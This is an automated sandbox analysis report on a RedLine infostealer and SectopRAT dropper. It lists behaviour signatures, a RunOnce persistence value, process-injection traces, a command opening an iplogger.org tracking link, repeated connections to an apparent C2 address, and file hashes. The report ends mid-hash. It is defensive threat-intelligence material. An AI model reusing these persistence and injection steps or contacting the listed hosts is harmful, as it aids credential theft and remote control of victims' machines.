Malware Analysis Report

2024-11-30 18:58

Sample ID 240315-vp9c5sdg81
Target cbf6b34e875fcf4e8a5a869f38801897
SHA256 0e472b9ec55d56c5679c755dc82a1206a0e77a1160634c36544cb803989ea8e3
Tags
redline sectoprat build2_mastif agilenet infostealer persistence rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0e472b9ec55d56c5679c755dc82a1206a0e77a1160634c36544cb803989ea8e3

Threat Level: Known bad

The file cbf6b34e875fcf4e8a5a869f38801897 was found to be: Known bad.

Malicious Activity Summary

redline sectoprat build2_mastif agilenet infostealer persistence rat trojan

SectopRAT

RedLine payload

RedLine

SectopRAT payload

Obfuscated with Agile.Net obfuscator

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Enumerates physical storage devices

Unsigned PE

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-15 17:11

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-15 17:11

Reported

2024-03-15 17:13

Platform

win7-20240221-en

Max time kernel

149s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2728 set thread context of 2820 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{05F20BD1-E2EF-11EE-9249-E299A69EE862} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "416684543" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d0820dddfb76da01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000fffacc0240230f40b575ac5982df49bd00000000020000000000106600000001000020000000f89e5e06da01f048097404898a1ae0e96ac50be4055742f5d58726ac2d5badb7000000000e80000000020000200000005610e0efb51ab8f012cc94a1156b684276166771d1da193594fe804d5580029d90000000518e33842b565ce99e7033640e0f04836374d753e9abb2498851cd7d7dfcf05603b0deabdb7ccf895b0e8d719e248e88b3463adf31bb5a6a560c2ee73e38ee9e9d0930182dd46fa7d8b318ff4a607e4aae7b50352c4a3545197af4a86ec286f368587ee510e24a1e3f1f892afda496ed739df3bf50da401850b12da619aac64b7fabe21fd290ade3a5bb4e72c68d224740000000db2e19fe845dcb3072c385a3996f0aebee12004551cceb8a52456355fa3f6f03ad8299d5d791d61e54b8fb23ba324456a57a04d0651f6b3e40c91573b11f10b2 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000fffacc0240230f40b575ac5982df49bd00000000020000000000106600000001000020000000326e35b5665992e20da2ee4cc8fe2843d78bdb922f02cff9390270e895f77d9b000000000e80000000020000200000005d95980e531beae7148c0af768c670e4c2095c39d9c4b0bd1ef60919fc77e45c200000006944b451ccb4d1026ee5175562aa93e18a49efda8a7ede66744b71f0972a33b7400000006012174b8eff7253d6c1cbebb552a70a8b7a45411bc21a76500ec750e63d3e882b1f9a587f780f5ad20f2fa63f97f37720033a00d916145160245bbd226a73a0 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1650401615-1019878084-3673944445-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1696 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe
PID 1696 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe
PID 1696 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe
PID 1696 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe
PID 1696 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe
PID 1696 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe
PID 1696 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe
PID 2472 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2472 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2472 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2472 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2472 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2472 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2472 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe C:\Windows\SysWOW64\cmd.exe
PID 2020 wrote to memory of 2616 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2020 wrote to memory of 2616 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2020 wrote to memory of 2616 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2020 wrote to memory of 2616 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 1696 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
PID 1696 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
PID 1696 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
PID 1696 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
PID 1696 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
PID 1696 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
PID 1696 wrote to memory of 2728 N/A C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
PID 2616 wrote to memory of 2416 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2616 wrote to memory of 2416 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2616 wrote to memory of 2416 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2616 wrote to memory of 2416 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2728 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
PID 2728 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
PID 2728 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
PID 2728 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
PID 2728 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
PID 2728 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
PID 2728 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
PID 2728 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
PID 2728 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
PID 2728 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
PID 2728 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
PID 2728 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
PID 2728 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
PID 2728 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
PID 2728 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
PID 2728 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
PID 2728 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
PID 2728 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE
PID 2728 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe

"C:\Users\Admin\AppData\Local\Temp\cbf6b34e875fcf4e8a5a869f38801897.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zS4A49.tmp\Install.cmd" "

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/1XQju7

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2616 CREDAT:275457 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE

"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE

"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE"

Network

Country Destination Domain Proto
US 8.8.8.8:53 iplogger.org udp
US 104.21.4.208:443 iplogger.org tcp
US 104.21.4.208:443 iplogger.org tcp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.184:80 apps.identrust.com tcp
GB 96.17.179.184:80 apps.identrust.com tcp
US 8.8.8.8:53 x2.c.lencr.org udp
GB 173.222.13.40:80 x2.c.lencr.org tcp
RU 95.181.157.69:8552 tcp
RU 95.181.157.69:8552 tcp
RU 95.181.157.69:8552 tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
RU 95.181.157.69:8552 tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
RU 95.181.157.69:8552 tcp
RU 95.181.157.69:8552 tcp
RU 95.181.157.69:8552 tcp
RU 95.181.157.69:8552 tcp
RU 95.181.157.69:8552 tcp
RU 95.181.157.69:8552 tcp
RU 95.181.157.69:8552 tcp
RU 95.181.157.69:8552 tcp
RU 95.181.157.69:8552 tcp
RU 95.181.157.69:8552 tcp
RU 95.181.157.69:8552 tcp
RU 95.181.157.69:8552 tcp
RU 95.181.157.69:8552 tcp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Install.exe

MD5 3973c47bf5f334ea720a9d603d2c6510
SHA1 bf2b72dc12d4d41e08b452e465c40d010b2aba4e
SHA256 4e9a1202844e30f1d62d837cdb440764c851740ab8ee2bd4a8a31475bd449eea
SHA512 cafc322ba71bafad2b15b82553a2a0749d0b6cb8349fe7fd24de25f7dca48c5aa0c9e7d170571c87a55381ec21d33045d7ba9a17891aabee187358da9b406861

C:\Users\Admin\AppData\Local\Temp\7zS4A49.tmp\Install.cmd

MD5 21661026606353f423078c883708787d
SHA1 338e288b851e0e5bee26f887e50bfcd8150e8257
SHA256 6a77796213adbc0eb764c070a3fdfcb5bfa3ad9b6215c1be43f09bfd32014782
SHA512 61760ab64e2c38d9bd5102ab0106e451a5c91e1598906f92e1285b7ae1ca1c6e02480d4157d0f350d2dc816088b5b0838a5d7c7b9d80444ecbf9d62b9ca5b65b

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNTIM~1.EXE

MD5 0c6ef320b361f01d63147dec80c3f34c
SHA1 c04adc3da100118f72e41c1c4645cbf8fa813cee
SHA256 bf89a45619528967430c483c01da54306e4f1b200a8c062697218fdd60bac93f
SHA512 f204ea35dffab3bd703ccf3a52e8ce26be5cde8f24b485b8a0c34a7dc9948bfcae3c7d2d268d5e4fd736dd55245ee995a4bfe0726e2b7fbb379095c69e9ddb69

memory/2728-48-0x0000000000110000-0x000000000021A000-memory.dmp

memory/2728-49-0x00000000748B0000-0x0000000074F9E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab55D0.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

memory/2728-68-0x0000000004940000-0x0000000004980000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 753df6889fd7410a2e9fe333da83a429
SHA1 3c425f16e8267186061dd48ac1c77c122962456e
SHA256 b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

C:\Users\Admin\AppData\Local\Temp\Tar5837.tmp

MD5 dd73cead4b93366cf3465c8cd32e2796
SHA1 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256 a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512 ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

memory/2728-98-0x0000000000570000-0x0000000000588000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f9c9a9276d4cfaf5ea70baf3f416e570
SHA1 39c181245a1ae4903c8e196f1ead604ebc80915b
SHA256 a3a44d35e184f6a8a0c3b74a78b61ccaff3d4a05584d91548bda95dd18011bf3
SHA512 db0aca17cd05686ecebf14c436ff78ea2e7dafc195d2416b9ec625c23936612fd16a43472ef17fe076de33d702792095736c1c4cbb9cf79d45351a7271ee8f26

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNQNAXHS\favicon[1].png

MD5 18c023bc439b446f91bf942270882422
SHA1 768d59e3085976dba252232a65a4af562675f782
SHA256 e0e71acef1efbfab69a1a60cd8fadded948d0e47a0a27c59a0be7033f6a84482
SHA512 a95ad7b48596bc0af23d05d1e58681e5d65e707247f96c5bc088880f4525312a1834a89615a0e33aea6b066793088a193ec29b5c96ea216f531c443487ae0735

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\5dcsbzd\imagestore.dat

MD5 8c41f105f24dbceacc972cd37be512ff
SHA1 4c2e0666a51e375567dfb3e9495ed6a91888b7b1
SHA256 e4f3834ef0e19ac9d748c144e199f9a8f98095753c8782efb89692e064f22ca2
SHA512 469425c32d9fb88b8fadf3865577c8f1b7a9c58b6773085bbdc27bca46fd63c60ba34cd3ca6dfebc3f3ddaeb84966e4ca6f4d4d916c573970d3ca5c3bdd49a9c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 05ea2a1b9c5bb2879e7ae829b037b42b
SHA1 4f3e69825297fd646e8dbc24f1973dcd46f284f2
SHA256 6ef084dd490ee4420c7efa347c51be05cc3b84839b9862ebee8a4d6a661c26b4
SHA512 0d97bc4b7d1d8b7ea94c141a4a140331957a3437200a2b3001731078c351893eb75f5f65556d81e031a5fd8d2e366d99b3405e5559d264f430add4f1a83237fb

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 bdddd212382db24d0955153e0daeada5
SHA1 e7e46ec0a8ee00b2456d56c88bccf2b00d9386a2
